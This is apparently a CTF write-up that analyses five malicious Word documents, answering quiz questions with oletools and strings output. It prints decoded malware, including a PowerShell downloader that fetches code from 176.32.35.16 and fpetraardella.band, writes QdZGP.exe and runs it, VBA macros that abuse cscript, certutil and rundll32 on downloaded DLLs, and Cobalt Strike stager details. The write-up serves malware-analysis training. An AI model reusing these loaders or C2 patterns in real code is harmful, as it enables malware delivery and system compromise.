Squid Game

Attacker 1

01. What is the malicious C2 domain you found in the maldoc where an executable download was attempted?

We will analyze this document by using oletools.

$ oledump.py attacker1.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:     13859 '1Table'
  5:     33430 'Data'
  6:       365 'Macros/PROJECT'
  7:        41 'Macros/PROJECTwm'
  8: M    9852 'Macros/VBA/ThisDocument'
  9:      5460 'Macros/VBA/_VBA_PROJECT'
 10:       513 'Macros/VBA/dir'
 11:       306 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Item'
 12:       341 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Properties'
 13:      4096 'WordDocument'

You will find obfuscated script from this document. At this stage, we can't do anything.

$ oledump.py -s 8 -v attacker1.doc 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)
lQbWzTrJtfhGiaS = pWNDRZbLZdGgl + CBool(5015) + Len(ChrW(1 + 1) + ChrW(2)) + LenB(Trim("XkBMzwHsSZswNPQMBDL")) + Len(SxZnBTiJkRBD)
.......

Try to upload to https://hybrid-analysis.com/. We will find detail background command from this report https://hybrid-analysis.com/sample/2979b5fbb454e2f13d89e58177f8c1f881bd3f0a0bebb1d27da9e189ba9d284e/618d7f92e234d60f96658a08.

We will decode this encoded base64.

$ echo 'JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA= ' | base64 -d
$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){

  if($m.Name -eq "DownloadString"){
    try{
     $uri = New-Object System.Uri("http://176.32.35.16/704e.php")
     IEX($m.Invoke($instance, ($uri)));
    }catch{}

  }

  if($m.Name -eq "DownloadData"){
     try{
     $uri = New-Object System.Uri("http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas")
     $response = $m.Invoke($instance, ($uri));

     $path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";
     [System.IO.File]::WriteAllBytes($path, $response);

     $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
     $type = [Type]::GetTypeFromCLSID($clsid)
     $object = [Activator]::CreateInstance($type)
     $object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)

     }catch{}
     
  }
}

Exit;

02. What executable file is the maldoc trying to drop?

$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";
[System.IO.File]::WriteAllBytes($path, $response);

03. In what folder is it dropping the malicious executable? (hint: %Folder%)

Try to search GetFolderPath("CommonApplicationData") on google. Here is a link that I found answer - https://stackoverflow.com/questions/895723/environment-getfolderpath-commonapplicationdata-is-still-returning-c-docum

%ProgramData%

04. Provide the name of the COM object the maldoc is trying to access.

Try to search $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880' on google. Here is a link that I found answer - https://strontic.github.io/xcyclopedia/library/clsid_c08afd90-f2a1-11d1-8455-00a0c91f3880.html

ShellBrowserWindows

05. Include the malicious IP and the php extension found in the maldoc. (Format: IP/name.php)

176.32.35.16/704e.php

06. Find the phone number in the maldoc. (Answer format: xxx-xxx-xxxx)

$ strings attacker1.doc
.....
Networked multi-state projection
West Virginia  Samanta
213-446-1757 x7135
Re-contextualized radical service-desk
Normal
 Windows
......

07. Doing some static analysis, provide the type of maldoc this is under the keyword "AutoOpen".

$ olevba -a attacker1.doc 
olevba 0.56 on Python 3.6.9 - http://decalage.info/python/oletools
===============================================================================
FILE: attacker1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: attacker1.doc - OLE stream: 'Macros/VBA/ThisDocument'
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|ChrW                |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

08. Provide the subject for this maldoc. (make sure to remove the extra whitespace)

$ file attacker1.doc 
attacker1.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Networked multi-state projection, Subject: West Virginia  Samanta, Author: 213-446-1757 x7135, Comments: Re-contextualized radical service-desk, Template: Normal, Last Saved By:  Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Thu Feb  7 23:45:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0

09. Provide the stream number that contains a macro.

$ oletimes attacker1.doc 
oletimes 0.54 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
FILE: attacker1.doc

+----------------------------+---------------------+---------------------+
| Stream/Storage name        | Modification Time   | Creation Time       |
+----------------------------+---------------------+---------------------+
| Root                       | 2019-02-07 23:45:30 | None                |
| '\x01CompObj'              | None                | None                |
| '\x05DocumentSummaryInform | None                | None                |
| ation'                     |                     |                     |
| '\x05SummaryInformation'   | None                | None                |
| '1Table'                   | None                | None                |
| 'Data'                     | None                | None                |
| 'Macros'                   | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| 'Macros/PROJECT'           | None                | None                |
| 'Macros/PROJECTwm'         | None                | None                |
| 'Macros/VBA'               | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| 'Macros/VBA/ThisDocument'  | None                | None                |
| 'Macros/VBA/_VBA_PROJECT'  | None                | None                |
| 'Macros/VBA/dir'           | None                | None                |
| 'MsoDataStore'             | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| 'MsoDataStore/ÇYÕXGNÎÕÃUKW | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| ÛÎIS2BKÍÐÐ=='              |                     |                     |
| 'MsoDataStore/ÇYÕXGNÎÕÃUKW | None                | None                |
| ÛÎIS2BKÍÐÐ==/Item'         |                     |                     |
| 'MsoDataStore/ÇYÕXGNÎÕÃUKW | None                | None                |
| ÛÎIS2BKÍÐÐ==/Properties'   |                     |                     |
| 'WordDocument'             | None                | None                |
+----------------------------+---------------------+---------------------+

10. Provide the stream number that contains a macro.

$ oledump.py attacker1.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:     13859 '1Table'
  5:     33430 'Data'
  6:       365 'Macros/PROJECT'
  7:        41 'Macros/PROJECTwm'
  8: M    9852 'Macros/VBA/ThisDocument'
  9:      5460 'Macros/VBA/_VBA_PROJECT'
 10:       513 'Macros/VBA/dir'
 11:       306 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Item'
 12:       341 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Properties'
 13:      4096 'WordDocument'

11. Provide the name of the stream that contains a macro.

8: M    9852 'Macros/VBA/ThisDocument'

Attacker 2

01. Provide the streams (numbers) that contain macros.

$ oledump.py attacker2.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      7427 '1Table'
  5:     63641 'Data'
  6:        97 'Macros/Form/\x01CompObj'
  7:       283 'Macros/Form/\x03VBFrame'
  8:     63528 'Macros/Form/f'
  9:      2220 'Macros/Form/o'
 10:       566 'Macros/PROJECT'
 11:        92 'Macros/PROJECTwm'
 12: M    6655 'Macros/VBA/Form'
 13: M   15671 'Macros/VBA/Module1'
 14: M    1593 'Macros/VBA/ThisDocument'
 15:     42465 'Macros/VBA/_VBA_PROJECT'
 16: M    2724 'Macros/VBA/bxh'
 17:      1226 'Macros/VBA/dir'
 18:      4096 'WordDocument'

02. Provide the size (bytes) of the compiled code for the second stream that contains a macro.

$ oledump.py attacker2.doc -i
  1:       114             '\x01CompObj'
  2:      4096             '\x05DocumentSummaryInformation'
  3:      4096             '\x05SummaryInformation'
  4:      7427             '1Table'
  5:     63641             'Data'
  6:        97             'Macros/Form/\x01CompObj'
  7:       283             'Macros/Form/\x03VBFrame'
  8:     63528             'Macros/Form/f'
  9:      2220             'Macros/Form/o'
 10:       566             'Macros/PROJECT'
 11:        92             'Macros/PROJECTwm'
 12: M    6655   4978+1677 'Macros/VBA/Form'
 13: M   15671  13867+1804 'Macros/VBA/Module1'
 14: M    1593    1396+197 'Macros/VBA/ThisDocument'
 15:     42465             'Macros/VBA/_VBA_PROJECT'
 16: M    2724    2397+327 'Macros/VBA/bxh'
 17:      1226             'Macros/VBA/dir'
 18:      4096             'WordDocument'

03. Provide the largest number of bytes found while analyzing the streams.

5:     63641             'Data'

04. Find the command located in the 'fun' field ( make sure to reverse the string).

$ oledump.py -s 16 -v attacker2.doc | grep fun | rev
))84(rhC ,)"cmd /k cscript.exe C:\ProgramData\pin.vbs"(esreveRrtS(llehS = nuf

05. Provide the first domain found in the maldoc.

priyacareers.com/u9hDQN9Yy7g/pt.html

06. Provide the second domain found in the maldoc.

perfectdemos.com/Gv1iNAuMKZ/pt.html

07. Provide the name of the first malicious DLL it retrieves from the C2 server.

www1.dll

08. How many DLLs does the maldoc retrieve from the domains?

09. Provide the path of where the malicious DLLs are getting dropped onto?

You can also view using olevba

$ oledump.py -s 16 -v attacker2.doc 
Attribute VB_Name = "bxh"
Sub eFile()
Dim QQ1 As Object
Set QQ1 = New Form
RO = StrReverse("\ataDmargorP\:C")
ROI = RO + StrReverse("sbv.nip")
ii = StrReverse("")
Ne = StrReverse("IZOIZIMIZI")
WW = QQ1.t2.Caption
MyFile = FreeFile
Open ROI For Output As #MyFile
Print #MyFile, WW
Close #MyFile
fun = Shell(StrReverse("sbv.nip\ataDmargorP\:C exe.tpircsc k/ dmc"), Chr(48))
End
End Sub

10. What program is it using to run DLLs?

$ olevba attacker2.doc
......
OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"
Ran.Run OK1, Chr(48)
OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr"
Ran.Run OK2, Chr(48)
OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr"
Ran.Run OK3, Chr(48)
OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr"
Ran.Run OK4, Chr(48)
OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr"
Ran.Run OK5, Chr(48)

11. How many seconds does the function in the maldoc sleep for to fully execute the malicious DLLs?

WScript.Sleep(15000)
OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"
Ran.Run OK1, Chr(48)

12. Under what stream did the main malicious script use to retrieve DLLs from the C2 domains? (Provide the name of the stream).

Macros/Form/o

Attacker 3

01. Provide the executable name being downloaded.

1.exe

02. What program is used to run the executable?

$ oledump.py -s 3 -v  attacker3.doc 
Attribute VB_Name = "T"
Sub autoopen()
LG = h("12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77")

Dim XN As New WshShell
Call XN.run("cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe", 0)
Call XN.run(LG, 0)

End Sub

03. Provide the malicious URI included in the maldoc that was used to download the binary (without http/https).

8cfayv.com/bolb/jaent.php?l=liut6.cab

04. What folder does the binary gets dropped in?

Call XN.run("cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe", 0)

05. Which stream executes the binary that was downloaded?

$ oledump.py attacker3.doc 
A: word/vbaProject.bin
 A1:       423 'PROJECT'
 A2:        53 'PROJECTwm'
 A3: M    2017 'VBA/T'
 A4: m    1127 'VBA/ThisDocument'
 A5:      2976 'VBA/_VBA_PROJECT'
 A6:      1864 'VBA/__SRP_0'
 A7:       190 'VBA/__SRP_1'
 A8:       348 'VBA/__SRP_2'
 A9:       106 'VBA/__SRP_3'
A10: M    1291 'VBA/d'
A11:       723 'VBA/dir'

Attacker 4

01. Provide the first decoded string found in this maldoc.

First we need to analyze using olevba.

$ olevba attacker4.doc
......
 Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
......

Change Hex Format and then decrypt xor with key.

MSXML2.XMLHTTP

02. Provide the name of the binary being dropped.

    ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
End Sub

03. Provide the folder where the binary is being dropped to.

    ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
End Sub

04. Provide the name of the second binary.

Sub IOWZJGNTSGK()
gGHBkj = XORI(Hextostring("1C3B2404757F5B2826593D3F00277E102A7F1E3C7F16263E5A2A2811"), Hextostring("744F50"))

05. Provide the full URI from which the second binary was downloaded (exclude http/https).

Sub IOWZJGNTSGK()
gGHBkj = XORI(Hextostring("1C3B2404757F5B2826593D3F00277E102A7F1E3C7F16263E5A2A2811"), Hextostring("744F50"))

Attacker 5

01. What is the caption you found in the maldoc?

$ strings attacker5.doc
MeIfYouCan 
   Caption         =   "CobaltStrikeIsEverywhere"
   ClientHeight    =   3015
   ClientLeft      =   120
   ClientTop       =   465
   ClientWidth     =   4560
   StartUpPosition =   1  'CenterOwner
   TypeInfoVer     =   2

02. What is the XOR decimal value found in the decoded-base64 script?

Firstly, dump with olevba. And then you will see base64 format and decode it. You need to remove . and space. And then again, we get another base64.

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

03. Provide the C2 IP address of the Cobalt Strike server.

Decrypt again!

176.103.56.89

04. Provide the full user-agent found.

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

05. Provide the path value for the Cobalt Strike shellcode.

/SjMR

06. Provide the port number of the Cobalt Strike C2 Server.

07. Provide the first two APIs found.

$ scdbgc -f '/home/remnux/Desktop/tryhackme/maldocs/download.dat' 
Loaded 31e bytes from file /home/remnux/Desktop/tryhackme/maldocs/download.dat
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000

4010a2	LoadLibraryA(wininet)
4010b0	InternetOpenA()
4010cc	InternetConnectA(server: 176.103.56.89, port: 8080, )

Stepcount 2000001

PreviousCarnage NextConti (Splunk)

Last updated 3 years ago

Was this helpful?